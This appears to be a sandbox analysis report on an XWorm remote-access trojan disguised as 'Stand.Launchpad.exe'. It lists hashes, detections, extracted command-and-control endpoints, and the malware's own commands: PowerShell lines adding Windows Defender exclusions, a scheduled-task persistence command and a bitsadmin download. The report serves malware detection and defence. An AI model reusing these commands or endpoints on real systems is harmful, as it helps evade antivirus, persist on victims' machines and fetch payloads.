Analysis
-
max time kernel
145s -
max time network
137s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
31-05-2024 04:12
Static task
static1
Behavioral task
behavioral1
Sample
Stand.Launchpad.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
Stand.Launchpad.exe
Resource
win10v2004-20240226-en
General
-
Target
Stand.Launchpad.exe
-
Size
140KB
-
MD5
bec01d16b6f3c443eb3912042c1fc7f9
-
SHA1
436c7fabff54997f2e550754edea0ae791080c9b
-
SHA256
2aa6b748a1ee67ba3f68a53228bbc14ed8ce1285e1dde54d310e2ca8797eb779
-
SHA512
4101f563c479a22883a024cbd9ba9d5a46234a237471b14853a82263e96f0ac74eb101dd77a71aab98101c8cb1c9c15ed987a45b3540d300c6bb740b707b27e1
-
SSDEEP
3072:J5XMHZjqrraIh3GGKt6cGuPN1OHXFhTVR7NetgV:H85jqrWIhGlN1sVhTwtg
Malware Config
Extracted
xworm
127.0.0.1:40971
us3.localto.net:40971
Name1442-40971.portmap.host:40971
-
Install_directory
%Temp%
-
install_file
Stand.exe
Signatures
-
Detect Xworm Payload 5 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe family_xworm behavioral1/memory/3008-9-0x0000000000F80000-0x0000000000FA0000-memory.dmp family_xworm behavioral1/memory/1876-56-0x00000000000D0000-0x00000000000F0000-memory.dmp family_xworm behavioral1/memory/1164-60-0x0000000000C90000-0x0000000000CB0000-memory.dmp family_xworm behavioral1/memory/2968-62-0x0000000000E50000-0x0000000000E70000-memory.dmp family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 1656 powershell.exe 2960 powershell.exe 1664 powershell.exe 2820 powershell.exe -
Drops startup file 2 IoCs
Processes:
Stand.Launchpad.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk Stand.Launchpad.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk Stand.Launchpad.exe -
Executes dropped EXE 4 IoCs
Processes:
Stand.Launchpad.exeStand.exeStand.exeStand.exepid process 3008 Stand.Launchpad.exe 1876 Stand.exe 1164 Stand.exe 2968 Stand.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Stand.Launchpad.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\Stand = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Stand.exe" Stand.Launchpad.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 8 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
Stand.Launchpad.exepid process 3008 Stand.Launchpad.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeStand.Launchpad.exepid process 2960 powershell.exe 1664 powershell.exe 2820 powershell.exe 1656 powershell.exe 3008 Stand.Launchpad.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
Stand.Launchpad.exepowershell.exepowershell.exepowershell.exepowershell.exeStand.exeStand.exeStand.exedescription pid process Token: SeDebugPrivilege 3008 Stand.Launchpad.exe Token: SeDebugPrivilege 2960 powershell.exe Token: SeDebugPrivilege 1664 powershell.exe Token: SeDebugPrivilege 2820 powershell.exe Token: SeDebugPrivilege 1656 powershell.exe Token: SeDebugPrivilege 3008 Stand.Launchpad.exe Token: SeDebugPrivilege 1876 Stand.exe Token: SeDebugPrivilege 1164 Stand.exe Token: SeDebugPrivilege 2968 Stand.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Stand.Launchpad.exepid process 3008 Stand.Launchpad.exe -
Suspicious use of WriteProcessMemory 35 IoCs
Processes:
Stand.Launchpad.exemshta.exeStand.Launchpad.exetaskeng.exedescription pid process target process PID 1920 wrote to memory of 2932 1920 Stand.Launchpad.exe mshta.exe PID 1920 wrote to memory of 2932 1920 Stand.Launchpad.exe mshta.exe PID 1920 wrote to memory of 2932 1920 Stand.Launchpad.exe mshta.exe PID 1920 wrote to memory of 2932 1920 Stand.Launchpad.exe mshta.exe PID 1920 wrote to memory of 3008 1920 Stand.Launchpad.exe Stand.Launchpad.exe PID 1920 wrote to memory of 3008 1920 Stand.Launchpad.exe Stand.Launchpad.exe PID 1920 wrote to memory of 3008 1920 Stand.Launchpad.exe Stand.Launchpad.exe PID 2932 wrote to memory of 2584 2932 mshta.exe bitsadmin.exe PID 2932 wrote to memory of 2584 2932 mshta.exe bitsadmin.exe PID 2932 wrote to memory of 2584 2932 mshta.exe bitsadmin.exe PID 2932 wrote to memory of 2584 2932 mshta.exe bitsadmin.exe PID 3008 wrote to memory of 2960 3008 Stand.Launchpad.exe powershell.exe PID 3008 wrote to memory of 2960 3008 Stand.Launchpad.exe powershell.exe PID 3008 wrote to memory of 2960 3008 Stand.Launchpad.exe powershell.exe PID 3008 wrote to memory of 1664 3008 Stand.Launchpad.exe powershell.exe PID 3008 wrote to memory of 1664 3008 Stand.Launchpad.exe powershell.exe PID 3008 wrote to memory of 1664 3008 Stand.Launchpad.exe powershell.exe PID 3008 wrote to memory of 2820 3008 Stand.Launchpad.exe powershell.exe PID 3008 wrote to memory of 2820 3008 Stand.Launchpad.exe powershell.exe PID 3008 wrote to memory of 2820 3008 Stand.Launchpad.exe powershell.exe PID 3008 wrote to memory of 1656 3008 Stand.Launchpad.exe powershell.exe PID 3008 wrote to memory of 1656 3008 Stand.Launchpad.exe powershell.exe PID 3008 wrote to memory of 1656 3008 Stand.Launchpad.exe powershell.exe PID 3008 wrote to memory of 1640 3008 Stand.Launchpad.exe schtasks.exe PID 3008 wrote to memory of 1640 3008 Stand.Launchpad.exe schtasks.exe PID 3008 wrote to memory of 1640 3008 Stand.Launchpad.exe schtasks.exe PID 2272 wrote to memory of 1876 2272 taskeng.exe Stand.exe PID 2272 wrote to memory of 1876 2272 taskeng.exe Stand.exe PID 2272 wrote to memory of 1876 2272 taskeng.exe Stand.exe PID 2272 wrote to memory of 1164 2272 taskeng.exe Stand.exe PID 2272 wrote to memory of 1164 2272 taskeng.exe Stand.exe PID 2272 wrote to memory of 1164 2272 taskeng.exe Stand.exe PID 2272 wrote to memory of 2968 2272 taskeng.exe Stand.exe PID 2272 wrote to memory of 2968 2272 taskeng.exe Stand.exe PID 2272 wrote to memory of 2968 2272 taskeng.exe Stand.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe"C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\Stand.exe3⤵
- Download via BitsAdmin
PID:2584
-
-
-
C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe"C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.Launchpad.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Stand.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Stand" /tr "C:\Users\Admin\AppData\Local\Temp\Stand.exe"3⤵
- Creates scheduled task(s)
PID:1640
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {84D18E47-A245-4D5E-BC4A-3643A59487EE} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Users\Admin\AppData\Local\Temp\Stand.exeC:\Users\Admin\AppData\Local\Temp\Stand.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1876
-
-
C:\Users\Admin\AppData\Local\Temp\Stand.exeC:\Users\Admin\AppData\Local\Temp\Stand.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1164
-
-
C:\Users\Admin\AppData\Local\Temp\Stand.exeC:\Users\Admin\AppData\Local\Temp\Stand.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
893B
MD5b0a6d4e05dc2225dd03902a3061a4041
SHA139c500eefbf78d7d51768edb6983c361213cb7b8
SHA25605e5c927c6366bebab2fb341d233887f503fb692d8f6880f7d1327b64705c1ee
SHA51296fb1e3046a0daddd6a17a38fcfa8ad6e00f8c4950cc7e46c8a79b24817b2f271229d15facaa510105d3c95234a9f095fdf8ff8bbb8099c47565bd955c316918
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD508bada4f319ea4dfca2b071b5af72c20
SHA1bb53e82ef774ba900fc4ae9322cee816f27e4d4e
SHA25612f78f810ba3d809182f9e0142ccb0b5c25b8e3eed0c68f73db7aa6edec097f7
SHA5120600b85196e1f3e3f2da20f765a3e1489fd8244646c56d2be9c3736d54c87d20c7c69fab3f7239cd0ea7443a94cd545ff25e80a41f4081175b6a418a1e0c9677
-
Filesize
108KB
MD5d51da3fa31165f2536dddad44974af34
SHA1703a62d92fbfe23611297715ca50bb82b4ff55a1
SHA2569cc68d4ab822bd8e5fd66f40b2c99bce04805505e593027aca67256ab63c6210
SHA5123adfaf5e251d974a9d576c71e51e3b1c59ddee2feecf281801166cf9448a3e51e6066737c06bee20089721630f4016f16ae7297061112cb23f2fe786386e4197
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e